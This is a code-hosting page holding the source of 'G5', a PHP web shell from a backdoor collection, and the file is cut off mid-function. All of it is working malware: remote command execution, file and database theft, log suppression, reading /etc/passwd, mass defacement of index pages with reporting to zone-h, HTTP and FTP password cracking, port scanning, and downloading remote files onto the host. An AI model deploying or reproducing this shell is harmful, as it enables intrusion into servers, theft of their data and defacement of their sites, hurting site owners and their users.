/Backdoors/PHP/G5.php
PHP | 1226 lines | 971 code | 49 blank | 206 comment | 125 complexity | 02741d0805cf6f79b2f40dcaaef78b28 MD5 | raw file
Large files files are truncated, but you can click here to view the full file
- <?php
- /**
- .-"""-.
- / .===. \
- \/ 6 6 \/
- ( \___/ )
- ______________ooo__\_____/__________________
- / \
- | Hi All |
- | $3ll: G5 (W.DLL) version 1.6 |
- | author: Piaster (wadelamin) |
- | Offical: http://piaster.blogspot.com |
- | E-mail: w.dll@live.com |
- | copyright: 2010-2011 Piaster. |
- | Page: www.facebook.com/Pias.Piaster |
- \___________________________ooo______________/
- | | |
- |_ | _|
- | | |
- |__|__|
- /-'P'-\
- (__/ \__)
- //--------------------------------------------/*/
- $access = 0; //if you don't wont anybody to access this file set $access=1
- $USR = "g5"; //User
- $PWD = "g5"; //PWD
- $color = 'black'; //#993333 #333333 style color
- $style = 'x4';// default x4 to change to orange style set var x5
- //---------------------------------------------------------------
- if($access==1){
- if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$USR || $_SERVER['PHP_AUTH_PW']!==$PWD){ob_end_clean();header('WWW-Authenticate: Basic realm="Piaster"');header('HTTP/1.0 401 Unauthorized');exit("<b><a href=http://www.w-dll.com>Piaster</a> : Access Denied</b>");}}
-
- session_start();
- @set_time_limit(0);
- @ini_restore("safe_mode");
- @ini_restore("allow_url_fopen");
- @ini_restore("open_basedir");
- @ini_restore("disable_functions");
- @ini_restore("safe_mode_exec_dir");
- @ini_restore("safe_mode_include_dir");
-
-
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- $php = $_SERVER["PHP_SELF"];
- if(version_compare(phpversion(), '4.1.0') == -1)
- {$_POST = &$HTTP_POST_VARS;
- $_GET = &$HTTP_GET_VARS;}
- $tl=7;
- global $loc,$pass,$port,$user,$db;
-
- if($_GET['kil']=="me"){
- @unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
- }
- $loc = 'localhost';
-
- define('db',htmlspecialchars($_POST['sqdbn']));
- define('pass',htmlspecialchars($_POST['sqpwd']));
- define('loc',htmlspecialchars($_POST['sqsrv'])? htmlspecialchars($_POST['sqsrv']):$log);
- define('port',htmlspecialchars($_POST['sqprt']));
- define('user',htmlspecialchars($_POST['sqlog']));
- define('style',$style);
- global $log;
- $log = @mysql_connect(loc,user,pass);
- $select = @mysql_select_db(db, $log);
- //$log = @mysqli_connect($loc,$user,$pass,$db,$port);
-
- if(isset($_REQUEST['dumd'])){
- $dt = date("Y-m-d");$db = $_POST['sqdbn'];$han = "WDLL-$db-$dt";$dmt = $_REQUEST['sqldp'];
- if ($dmt=='SQL'){$han="WDLL-$db-$dT.sql";$fp=fopen($han,"w");}else{$han="WDLL-$db-$dt.sql.gz";
- $fp = gzopen($han,"w");}
-
- $tb = @mysql_query ("SHOW TABLES");
- while ($X = @mysql_fetch_array($tb)) {
- $X = $X['Tables_in_'.$db];$mf = @mysql_fetch_array(@mysql_query ("SHOW CREATE TABLE ".$X));rt($mf['Create Table'].";\n\n");$sql = @mysql_query ("SELECT * FROM ".$X);
- if (@mysql_num_rows($sql)) {while ($row = @mysql_fetch_row($sql)) {foreach ($row as $v => $w) {
- $row[$v] = "'".@mysql_escape_string($w)."'";}rt("INSERT INTO $X VALUES(".implode(",", $row).");\n");}}}
- if ($dmt=='SQL'){fclose ($fp);}else{gzclose($fp);}
- header("Content-Disposition: attachment; filename=" . $han);
- header("Content-Type: application/download");
- header("Content-Length: " . @filesize($han));@flush();
- $fp = @fopen($han, "r");while (!feof($fp)){echo @fread($fp, 65536);@flush();} @fclose($fp); }
-
- if (isset($_REQUEST['dWNf'])||isset($_REQUEST["download"]) && $_REQUEST["download"] != @basename($_SERVER["SCRIPT_FILENAME"]))
- {if(isset($_REQUEST['dWNf'])){$file = htmlspecialchars($_POST['dWn']);}else {$file =$_REQUEST["download"];}
- header('Content-Length:'.@filesize($file).'');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.$file.'"');
- if(function_exists('readfile')){@readfile($file);}else @file_get_contents($$file);}
- if (!empty($_POST['goto'])) { @chdir($_POST['goto']); $path = @realpath($_POST['goto']);}
- if(isset($_GET['dir'])&& !@is_file($_GET['dir'])){$path =@chdir(base64_decode(htmlspecialchars($_GET['dir'])));}
- if($dir){@chdir($_POST['dir']);}
- else {$path = @realpath(".");}
- $path = @realpath(".");
-
- if(!$win){
- define(path,$path);}else
- {$mxpath = str_replace('\\','/',$path);
- define(path,$mxpath.'/');}
- function curc(){
- $crk = @get_loaded_extensions();
- if(@in_array("curl", $crk)){return true;}else {return false;}}
-
- if(isset($_REQUEST["sqconf"]) or isset($_REQUEST["msq1"])){head('black');}
- else {head($color);} // ^_^
- if (isset($_REQUEST["action"]) && $_REQUEST["action"] != @basename($_SERVER["SCRIPT_FILENAME"])){
- $fa = stripcslashes(htmlspecialchars($_REQUEST["action"]));
- $fa = urldecode(base64_decode(str_replace("\\\\","\\",$fa)));
- ;echo "<center><br><br> <p align=\"center\"><a href=\"javascript: close()\">Close</a></p><table border =\"1\" bgcolor =\"black\"><tr><td><font color =\"red\"><b> File Path: </font> " .$fa. "</td><tr><tr><td><font color =\"red\"><b>File Size: </b></font>" . wdll_s1z(@filesize($fa)) ."</td></tr> <tr><td><font color =\"red\"><b>Create:</b></font> ".@date('d/m/Y H:i:s',@filectime($fa))."</td></tr><tr><td><font color =\"red\"><b>Modify: </b></font>" .@date('d/m/Y H:i:s', @filemtime($fa)) ."</td></tr><tr><td><font color =\"red\"><b>Mode: </b></font>" .wdll_permc($fa) . "</td></tr></table></center><br><center><table><tr>";echo "<form method=\"post\" action=\"" . $php . "?download=".$fa ."\"> ";sub('down','Download',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?cod=" .@base64_encode($fa)."\">";sub('Source','Source',$pr='');echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?chmod=" .$fa."\">";echo "</form>";echo "<form method=\"post\" action=\"" . $php . "?delete=" .@base64_encode($fa)."\">";sub('Delete','Delete',$pr='');echo "</form>";echo "</tr></table></center>";ft(); die;}
-
- if (isset($_REQUEST["delete"]) && $_REQUEST["delete"] != @basename($_SERVER["SCRIPT_FILENAME"]))
- {$rdel = base64_decode($_REQUEST["delete"]);
- $rdel = str_replace("\\", DIRECTORY_SEPARATOR, $rdel);if (@is_dir($rdel)){if (substr($rdel, -1) != DIRECTORY_SEPARATOR){$rdel .= DIRECTORY_SEPARATOR;}} elseif (is_file($rdel)){if(@unlink(htmlspecialchars($rdel))){echo "file " . $rdel . " Removed";}} else {echo "File Not Found";}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
-
- if (isset($_REQUEST["cod"]) && $_REQUEST["cod"] != @basename($_SERVER["SCRIPT_FILENAME"])){ if ($_REQUEST["cod"]){$tx = @base64_decode($_REQUEST["cod"]);if(function_exists('highlight_file')){@highlight_file($tx);}elseif(@function_exists('file_get_contents')){echo @file_get_contents($tx);}elseif(function_exists('file')){echo @file($tx);}else {rd();}}echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>";ft(); die;}
-
- if (isset($_REQUEST["info"]) && $_REQUEST["info"] != @basename($_SERVER["SCRIPT_FILENAME"]))
- { echo("(wadelamin)<br> www.w.dll-sd.com<br>www.piaster.net<br> w.dll@live.com 2011 ");echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";ft(); die;}
- if(isset($_REQUEST['allss'])){
- switch ($_REQUEST['fsOP'])
- {
- //toolz
- case 'cmdr': {$oP = 6;}break;
- case 'mil' : {$oP = 7;}break;
- case 'fts' : {$oP = 8;}break;
- case 'ftm' : {$oP = 9;}break;
- case 'frc' : {$oP = 10;}break;
- case 'fcf' : {$oP = 11;}break;
- case 'fsf' : {$oP = 12;}break;
- case 'fbk' : {$oP = 13;}break;
- case 'cry' : {$oP = 14;}break;
- case 'seaa': {$oP = 15;}break;
- }define(oP,$oP);}
- if(isset($_REQUEST['allqw'])){
- switch ($_REQUEST['dbOP']){
- case 'dmi': {$oPp = 1; }break;
- case 'ddu' : {$oPp = 2;}break;
- case 'ddr' : {$oPp = 3;}break;
- case 'dau' : {$oPp = 4;}break;
- case 'dml' : {$oPp = 5;}break;
- case 'dqu' : {$oPp = 6;}break;
- case 'etr' : {$oPp = 7;}break;
-
- }define(oPp,$oPp);}
-
- if(isset($_REQUEST['mSendm'])) {
-
- $headers = 'To: '.$_REQUEST['mito']."\r\n";
- $headers .= 'From: '.$_REQUEST['mnam'].' '.$_REQUEST['mmail']."\r\n";
- if (mail($_REQUEST['mito'],$_REQUEST['msubj'],$_REQUEST['mmsg'],$headers)) {
- echo "<center><b>Email sent!</b></center>";
- }
- else { echo "<center>Couldn't send email!</center>"; }
- echo "<br><br><br><a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>"; ft();exit; }
- if(isset($_REQUEST["massa"]))
- {global $coded,$lop,$msi;
- $lop = 2;
- $coded = htmlspecialchars($_POST['coded']);
- $skid= htmlspecialchars($_POST['skid']);
- $msd = htmlspecialchars($_POST['masdr']);
- @chdir($msd);
- $msi = $_POST['msi'];
- if($msi == 'msfi'||$msi == 'msfa'||$msi == 'msfr'){
- $msdr = @opendir($msd) or die("<br><b>Permision denied! Unable to open dir $msd");
- wdll_nora($msdr, $msd,$coded,$skid);
- }
- else{db_mass($coded,$msi);exit;}}
-
- function fetchFilef($url,$path,$file)
- {$data=fetchFile($url);
- if ($data)
- {$d=@fopen($path.'/'.$file,"wb");
- $ret=@fwrite($d,$data);
- @fclose($d);
- return $ret;}return false;}
-
- function fetchFile($url){
- $urlpr=@parse_url($url);
- $in='';
- $host=$urlpr['host'];
- $port=isset($urlpr['port']) ? intval($urlpr['port']) : 80;
- if ($port==0) $port=80;
- $path=$urlpr['path'];
- if (isset($urlpr['query'])&&$urlpr['query']!='') $path.='?'.$urlpr['query'];
- $fs=@fsockopen($host,$port,$errno,$errstr,3);
- if ($fs)
- {$out="GET $path HTTP/1.1\r\nHost: $host\r\n";
- $out.="Connection: close\r\n\r\n";
- @fwrite($fs,$out);
- $end=false;
- while (!feof($fs))
- {$fl=@fgets($fs,1024);
- if ($end) $in.=$fl;
- if ($fl=="\r\n") $end=true;}
- @fclose($fs);
- }return $in;}
- function rt($dat) {global $fp;if ($_REQUEST['sqldp']=='SQL'){@fwrite($fp,$dat);}else{@gzwrite($fp, $dat);}}
-
- if(@function_exists('mysql_connect')){$dtb = "<font color=green>MySQL : On</font>";};if(@function_exists('mssql_connect')){$dtb = "<font color=green>MSSQL : On</font>";};if(@function_exists('pg_connect')){$dtb = "<font color=green>PostgreSQL : On</font>";};if(@function_exists('ocilogon')){$dtb = "<font color=green>Oracle : On</font>";};
- $win = strtolower(substr(PHP_OS,0,3)) == "win";
- $HO= "<a href=\"".$php."\">Home</a>";$kilm= "<a href=\"".$php."?kil=me\">Kill Me</a>";
- $sys = "OS: <font color=orange>".@wordwrap(@php_uname())."</font>";
- $us = "User: <font color=orange>".@get_current_user()."</font>";
- $SAD = "Admin Mail: <font color=orange>".$_SERVER['SERVER_ADMIN']."</font>";
- $soft = "Server: "."<font color=orange>".@getenv("SERVER_SOFTWARE")."</font>";
- if(@ini_get('disable_functions')){$FUC="Functions: <font color=red>Disable</font>";}else{$FUC="Functions:<font color=green> Enable</font>";}
- if(curc()){$cur="Curl: <font color=green>Enable</font>";}else{$cur="Curl: <font color=red>Disable</font>";}
- if (function_exists('ini_get'))
- if (@ini_get("safe_mode") || strtolower(@ini_get("safe_mode")) == "on")
- {$safe= TRUE;$mode = "<font color=red>ON</font>";}
- else {$safe = FALSE; $mode = "<font color=green>OFF</font>";}
- if (function_exists('ini_get'))
- {$ob = @ini_get("open_basedir");}else {$ob = @get_cfg_var("open_basedir");}
- if ($ob or strtolower($ob) == "on") {$openB = TRUE; $basedir = "<font color=red>".$ob."</font>";}
- else {$openB = FALSE; $basedir = "<font color=green>OFF</font>";}
- echo "<br><table bgcolor=\"800000\" width =80%><td>";
- echo "|| $HO || Safe Mode = ".$mode." | Open_Basedir = ". $basedir." |".$us." |".$soft." | ".$SAD." | ".$FUC." | ".$cur."<BR>";
-
- echo $sys;
- if(!$win)echo " | <b>Uid=".@getmyuid()." Gid=".@getmygid()."</b> |";
- if (is_callable("disk_free_space"))
- {$fre = @disk_free_space($path);$tot = @disk_total_space($path);if ($fre === FALSE) {$fre = 0;}if ($tot === FALSE) {$tot = 0;}if ($fre < 0) {$fre = 0;}if ($tot < 0) {$tot = 0;}$used = $tot-$fre;$frep = @round(100/($tot/$fre),2);
- echo " | HDD Free <font color =\"orange\">".wdll_s1z($fre)."</font> HDD Total <font color =\"orange\">".wdll_s1z($tot)."</font> (".$frep."%)</b> ";}
- echo"<font color=ffffff> |Dir mode: <b>".substr(decoct(@fileperms($path)), -3, 3)."</b></font>| DB: ".$dtb." | ".$kilm."";
- echo "</td></table><br>";
-
- if(isset($_REQUEST["find"]))
- {wdll_repx(); global $fin;
- $pathfd =htmlspecialchars($_POST['goto']);
- $fin = stripcslashes(htmlspecialchars($_POST['fin']));$fin = str_replace("\\\\","\\",$fin);
- $dih = @opendir($pathfd) or die("<br><b>Permision denied! Unable to open dir $path");
- echo wdll_nora($dih,$pathfd,$fin);}
-
- if(isset($_REQUEST["search"]))
- { global $words,$wordonly,$sesir,$serdir,$sea,$lop;
- $lop = 1;
- $serdir = htmlspecialchars($_POST['serdir']);
- $sesir = htmlspecialchars($_POST['sedir']);
- $words = trim(htmlspecialchars($_POST['searcc']));
- $wordonly = trim('/'.$words.'/');
-
- $sea = $_POST['sea'];
- $skid= htmlspecialchars($_POST['skid']);
- wdll_repx();
- $ser = @opendir($serdir) or die("<br><b>Permision denied! Unable to open dir $path");
- wdll_nora($ser, $serdir,$words,$skid);
- echo "<a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";exit;}
-
- if(oP == '10' || isset($_GET['dir'])|| isset($_GET['show'])||isset($_REQUEST["dir"]))
- {echo "<form action=\"".$php."\"method=\"post\">
- <a href=\"".$php."\">Home</a>| |<a href=\"javascript: history.go(-1)\">Back</a><br>";
- if($win)wdir();echo "<br><br>
- <b>Change Directory<br></b>";
- inp('text','25','goto',path);
- sub('dir','GO');
- echo "</form>";
- $files = array();
- $dir = array();
- wdll_repxl();
- if ($handle = @opendir(path))
- {while (false !== ($file = @readdir($handle)))
- {if(@is_dir($file)){$dir[] = $file;}else{$files[] = $file;}}
- asort($dir);asort($files);
- foreach($dir as $file){wdll_repxt($file);}
- foreach($files as $file){wdll_repxtr($file);}}
- else{echo "<u>Error!</u> Can't open <b>".@realpath('.')."</b>!<br>";}if(!isset($_GET['show']))exit();
- }
- function CFile($file,$serc)
- {
- if (!@is_readable($file))
- {@chmod($file, 0644);}
- $ioo = @file_get_contents($file);
- $x0 = true;
- if(@preg_match($serc, $ioo))
- {$x0 = false;}return $x0;}
-
- function md($mvdir,$dst,$cop=false) {
- if (substr($dst,-1) == "\\") $dst = substr($dst,0,strlen($dst)-1);
- if (substr($mvdir,-1) == "\\") $mvdir = substr($mvdir,0,strlen($mvdir)-1);
- if (!file_exists($mvdir)) return FALSE;
- dexists($dst);
- $han = @opendir($mvdir);
- while ($f = @readdir($han)) {
- $mvd = $mvdir . "\\" . $f;
- if (@is_dir($mvd)) {
- if (!($f['value']=="." || $f=="..")) {
- md($mvd,$dst . "\\" . $f,$cop);};} else {
- if(@copy( $mvd ,$dst . "\\" . $f))echo $mvd." Move Done \n";
- if (!$cop) {
- @unlink($mvd);};};};@closedir($han);if (!$cop) {@rmdir($mvdir);};return TRUE;};
- function dexists($dir) {
- if (substr($dir,-1) == "\\") $dir = substr($dir,0,strlen($dir)-1);
- if (@file_exists($dir)) return TRUE;
- $ex = explode("\\",$dir);
- while ($mc = each($ex)) {
- $mx = $mc['value'];};
- $mx = str_replace("\\" . $mx,"",$dir);
- if (!file_exists($mx)) {
- dexists($mx);};
- @mkdir($dir,0777);
- return TRUE;}
-
- $sqquery = htmlspecialchars($_POST['sqquery']);
- define(sql_query,$sqquery);
-
- if($_REQUEST['do']=="db" || isset($_REQUEST['sqlwxp'])){
- echo sqlexp();
- exit;}
-
- if(isset($_REQUEST["sqconf"])){wdll_dbc();exit;}
- wdll_bdx('800000');
-
- function wdll_nora($dih, $path,$fin='',$skid ='')
- { global $words,$wordonly,$sesir,$serdir,$sea,$msi,$lop,$fin;
- while (false !== ($file = @readdir($dih)))
- {$dir = $path . '/' . $file;
- if (@is_dir($dir) && $file != '.' && $file != '..' && $file != $skid)
- {
- $wok = @opendir($dir) or die("<br><b>Permision denied! undable to open dir $file");
- wdll_nora($wok, $dir,$fin,$skid);}
- elseif ($file != '.' && $file != '..' && $file != $skid)
- {
- if($_REQUEST["find"]){if($file == $fin){wdll_rep($dir, $path, $file);}}
- if($lop=='1'){
- switch ($_REQUEST["sea"])
- {
- case('cepr'):{if(!CFile($dir,$words)){wdll_rep($dir, $path, $file);}}break;
- case('cewo'):{if(!CFile($dir,$wordonly)){wdll_rep($dir, $path, $file);}}break;
-
- case('cefi'):{if (similar_text($file, $words) >= 3){wdll_rep($dir, $path, $file);}}break;
- case('cefn'):{if($file == $words){wdll_rep($dir, $path, $file);}}break;
-
- case('cefm'):{$perm = substr(decoct(@fileperms($dir)), -3, 3);if($perm == $words){wdll_rep($dir, $path, $file);} }break;
- case('ceft'):{$xtr = @pathinfo($file);$extt = $xtr["extension"]; if($extt == $words){wdll_rep($dir, $path, $file);}}break;
-
- default:{ echo "<a href=\"javascript: history.go(-1)\">Back.... </a>";die('PLZ Select Search Mode');}}}
-
- if($lop =='2')
- {switch ($_REQUEST["msi"]){ case('msfi'):{if($file == 'index.php'or $file == 'home.php'or $file == 'index.aspx'or $file == 'index.html'or $file == 'index.htm'){ fiindex($dir);}}break;
- case('msfa'):{if(@is_file($dir)) {fiindex($dir);}}break;
- case('msfr'):{if($file != 'index.php'or $file != 'home.php'or $file != 'home.aspx'or $file != 'index.html'or $file != 'index.htm'){delf($dir);}}break;}}
-
- }}@closedir($dih);}
- //-------------------------------------------------------------------------------
-
- function extr_si(){
- $rvlink = $_REQUEST["sqtid"];
- {
- $rvsorc = "http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php?remoteAddress=";
- $rvall = $rvsorc.$rvlink;
- $rvcon = file_get_contents($rvall);
- preg_match_all('/"(.*?)"/si', $rvcon, $rvsits);
- foreach(array_unique($rvsits[1]) as $rvrs) {
- if(strstr($rvrs,'.')) {
- if(eregi('www',$rvrs)) {
- echo "http://".$rvrs."\n";
- }
- else {
- echo "http://www.".$rvrs."\n";}}}}
- }
- function cc($sit,$prt,$usr,$pwd,$tl){
- $ses = @curl_init();
- @curl_setopt($ses, CURLOPT_URL, "http://$sit:$prt");
- @curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
- @curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- @curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
- @curl_setopt($ses, CURLOPT_CONNECTTIMEOUT, $tl);
- @curl_setopt($ses, CURLOPT_FAILONERROR, 1);
- $mix = @curl_exec($ses); return $mix;
- if ( @curl_errno($ses) == 28 ) {$er= "Connection Timeout Please Check [".$sit."]\n"; return $er; exit;}
- elseif ( @curl_errno($ses) == 0 )
- {$fc ="Cracking Success With Username [".$usr."] and Password [".$pwd."] Enjoy\n"; return $fc;}
- @curl_close($ses);}
-
- function fc($sit,$usr,$pwd,$tl){
- $ses = @curl_init();
- @curl_setopt($ses, CURLOPT_URL, "ftp://$sit");
- @curl_setopt($ses, CURLOPT_RETURNTRANSFER, 1);
- @curl_setopt($ses, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- @curl_setopt($ses, CURLOPT_FTPLISTONLY, 1);
- @curl_setopt($ses, CURLOPT_USERPWD, "$usr:$pwd");
- @curl_setopt ($ses, CURLOPT_CONNECTTIMEOUT, $tl);
- @curl_setopt($ses, CURLOPT_FAILONERROR, 1);
- $mix = @curl_exec($ses);
- if ( @curl_errno($ses) == 28 ) {$er ="[+]Error :Connection Timeout Please Check [".$sit."]\n"; return $er; exit;}
- elseif ( @curl_errno($ses) == 0 ){
- $fc = "[+]Cracking Success With Username [".$usr."] and Password [".$pwd."] Enjoy\n";}
- return $fc;
- @curl_close($ses);}
-
- function zhsr($hname,$htype,$hwhy,$domain)
- {$zh = 'http://zone-h.org/notify/single/';
- echo $zh."defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy."\n";
- $ch = @curl_init();
- @curl_setopt($ch, CURLOPT_URL, $zh);
- @curl_setopt($ch,CURLOPT_POST,true);
- @curl_setopt($ch, CURLOPT_POSTFIELDS,"defacer=".$hname."&domain1=". $domain."&hackmode=".$htype."&reason=".$hwhy);
- @curl_setopt($ch,CURLOPT_FOLLOWLOCATION, true);
- @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- if ( @curl_errno($ch) == 28 ) {$er= "Connection Timeout Please Check [http://zone-h.org]\n"; echo $er."\n"; exit;}
- elseif ( @curl_errno($ch) == 0 ) {echo "[+]Zone-H Done\n";}
- $rs = @curl_exec($ch);@curl_close($ch);echo $rs;}
-
- function wdll_updir($dih, $path)
- {while (false !== ($file = @readdir($dih))){$dir = $path . '/' . $file;
- if ($file != '.' && $file != '..'){if(!@is_file($file)){echo $dir." =======>[DIR]\n";}else echo $dir."\n";}}@closedir($dih);}
-
- function wdll_p($mode)
- {switch(true){case(($mode & 0xC000) === 0xC000): {$t = "s";}break;case(($mode & 0x4000) === 0x4000): {$t = "d";}break;case(($mode & 0xA000) === 0xA000): {$t = "l";}break;case(($mode & 0x8000) === 0x8000): {$t = "-";}break;case(($mode & 0x6000) === 0x6000): {$t = "b";}break;case(($mode & 0x2000) === 0x2000): {$t = "c";}break;case(($mode & 0x1000) === 0x1000): {$t = "p";}break;case true :{$t = "?"; }break;}$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0;$o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;return array("t" => $t, "o" => $o, "g" => $g, "w" => $w);}
-
- function show_users()
- {$users = array();$rows=@file('/etc/passwd');if(!$rows) return 0;foreach ($rows as $string){$user = @explode(":",$string);if(substr($string,0,1)!='#') array_push($users,$user[0]);}echo $users."\n";}
- function wdll_permc($file)
- { if(@is_writable($file)) { return "writable";}
- if(!@is_writable($file) && @is_readable($file)) { return "red only";}
- if(!@is_writable($file) && @!is_readable($file)) { return "un writable";}
- }
- function wdll_perm($file)
- {
- $mode=@fileperms($file);
- $perms='';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
-
- if(isset($_REQUEST["svff"]))
- {$wdf = stripslashes(stripcslashes($_POST['svdi']));
- $wdn = stripslashes(stripcslashes($_POST['cfed']));
- $wdc = @fopen($wdf, "wb");
- @fwrite($wdc, $wdn);
- @fclose($wdc);}
-
- function delf($dir)
- {$dir = str_replace("\\", DIRECTORY_SEPARATOR, $dir);
- if (@is_dir($dir)){if (substr($dir, -1) != DIRECTORY_SEPARATOR){$dir .= DIRECTORY_SEPARATOR;}}
- elseif (@is_file($dir)){if (@unlink($dir)){echo "File: ".$dir." ................Removed<br>";}}
- else{echo "Could not remove " . $dir . " OR File not Found";}}
-
- function wdll_cmdf($cmdq)
- {$res = '';if (!empty($cmdq)){if(function_exists('exec')){@exec($cmdq,$res);$res = @join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cmdq);}elseif(function_exists('system')){@ob_start();@system($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cmdq);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cmdq,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}
-
- function fiindex($wdf)
- {global $coded;
- $wdc = @fopen($wdf, "wb");
- $wdn = str_replace("\\"," ",$coded);
- @fwrite($wdc, $wdn);
- if(@fclose($wdc))echo $wdf.".........Done<br>";
- return true; }
- function wdll_chf()
- {@ini_restore("safe_mode");
- @ini_restore("open_basedir");if(function_exists('exec')) return true;
- elseif(function_exists('system')) return true;
- elseif(function_exists('shell_exec')) return true;
- elseif(function_exists('passthru')) return true;
- else return false;}
-
- function wdll_s1z($size, $digits = 2)
- { $kb = 1024; $mb = 1024 * $kb; $gb= 1024 * $mb; $tb = 1024 * $gb;
- switch (true){
- case ($size == 0): { return "N/A"; }break;
- case ($size < $kb): { return $size."B"; }break;
- case ($size < $mb): { return @round($size / $kb,$digits)."KB"; }break;
- case ($size < $gb): { return @round($size / $mb,$digits)."MB"; }break;
- case ($size < $tb): { return @round($size / $gb,$digits)."GB"; }break;
- case true: { return @round($size / $tb, $digits)."TB"; }break;
- }}
- function ps() {
-
- $hot = htmlspecialchars($_POST['hot']);
- $spt =intval(htmlspecialchars($_POST['spot']));
- $ept = intval(htmlspecialchars($_POST['epot']));
- echo "IP/Domain : ".$hot;
- echo "\nChecking...From ".$spt." To ".$ept." Ports\n";
- for($x = $spt; $x <= $ept; $x++) {
- $OK = @fsockopen($hot, $x, $errno, $errstr, 3);
- if($OK) {
- echo "[-] Port [".$x."] is open\n";}}echo "Port Scan Complete";}
-
- function rf(){$temp=@tempnam('', "wd");$pos= stripslashes($_POST['cfil']);if(@copy("compress.zlib://".$pos, $temp)){$han = @fopen($temp, "r");$fct = @fread($han, @filesize($temp));@fclose($han);return $fct;@unlink($temp);} else {echo("File".$pos."dosen't exists or you don't haveaccess.");}}
-
- if (!$error)
- {if (function_exists('ini_get')){$umf=@ini_get("upload_max_filesize");}else {$umf =@get_cfg_var('upload_max_filesize');}
- if (preg_match("/([0-9]+)K/i",$umf,$tem)) $umf=$tem[1]*1024;
- if (preg_match("/([0-9]+)M/i",$umf,$tem)) $umf=$tem[1]*1024*1024;
- if (preg_match("/([0-9]+)G/i",$umf,$tem)) $umf=$tem[1]*1024*1024*1024;}
-
-
- $up_d = $path ;
-
- if (!$error && isset($_REQUEST["upcom"]))
- { if (@is_uploaded_file($_FILES["dfill"]["tmp_name"]) && ($_FILES["dfill"]["error"])==0)
- {
- $up_fn=str_replace(" ","_",$_FILES["dfill"]["name"]);
- $up_fn=preg_replace("/[^_A-Za-z0-9-\.]/i",'',$up_fn);
- $up_fp=str_replace("\\","/",$up_d."/".$up_fn);
- if (file_exists($up_fn))
- { echo ("<p class=\"error\">File $up_fn already exist! Delete and upload again!</p>\n");}
- else if (!@move_uploaded_file($_FILES["dfill"]["tmp_name"],$up_fp))
- { echo ("<p class=\"error\">Error moving uploaded file ".$_FILES["dfill"]["tmp_name"]." to the $up_fp</p>\n");
- echo ("<p>Check the directory permissions for $up_d (must be 777)!</p>\n");icod();}else
- { echo ("<p class=\"success\">Uploaded file saved as $up_fn</p>\n");}}else
- { echo ("<p class=\"error\">Error uploading file ".$_FILES["dfill"]["name"]."</p>\n");}}
-
-
- echo "<div align = center>";
- if (isset($_REQUEST["mkD"]))
- {
- if (file_exists(htmlspecialchars($_POST['mKd'])))
- {echo "Make Dir: \"".htmlspecialchars($_POST['mKd'])."\" Dir alredy exists";}
- elseif (!@mkdir(htmlspecialchars($_POST['mKd']),0777))
- {echo "Make Dir \"".htmlspecialchars($_POST['mKd'])."\" access denied";}
- else {echo "Dir :".htmlspecialchars($_POST['mKd'])."Created Done"; }
- }
- if (isset($_REQUEST["mkF"]))
- {
- if (file_exists($mkfile))
- {echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" File alredy exists";}
- elseif (!@fopen(htmlspecialchars($_POST['mKf']), "wb"))
- {echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" access denied";}
- else {echo "<b>File:".htmlspecialchars($_POST['mKf'])."Created Done";}
- }
- if(isset($_REQUEST["chfl"])){
- $ftc = htmlspecialchars($_POST['cfx']);
- $ftx = $_POST['cfy'];
- echo $ftc.$ftx;
- switch($_POST['ch'])
- {
- case 'cm':
- if(@chmod($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
- access";break;case 'co':
- if(@chown($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
- access";break;case 'cg':
- if(@chgrp($ftc,$ftx)){echo "File: ".$ftc." CH to | ".$ftx;}else echo " dosen't exists or you don't have
- access";break;case 'cu':if(@unlink($ftc)){echo "File: ".$ftc." Removed";}else echo " dosen't exists or you don't haveaccess";break;}}
-
- if(isset($_REQUEST["upff"]))
- {
- $ft1 = htmlspecialchars($_POST['upf']);
- $cod = htmlspecialchars($_POST['code']);
- fmas($ft1,$cod);
- }
- function fmas($dir,$codm)
- {
- $han = @fopen($dir,"w+");
- @fwrite($han, $codm);
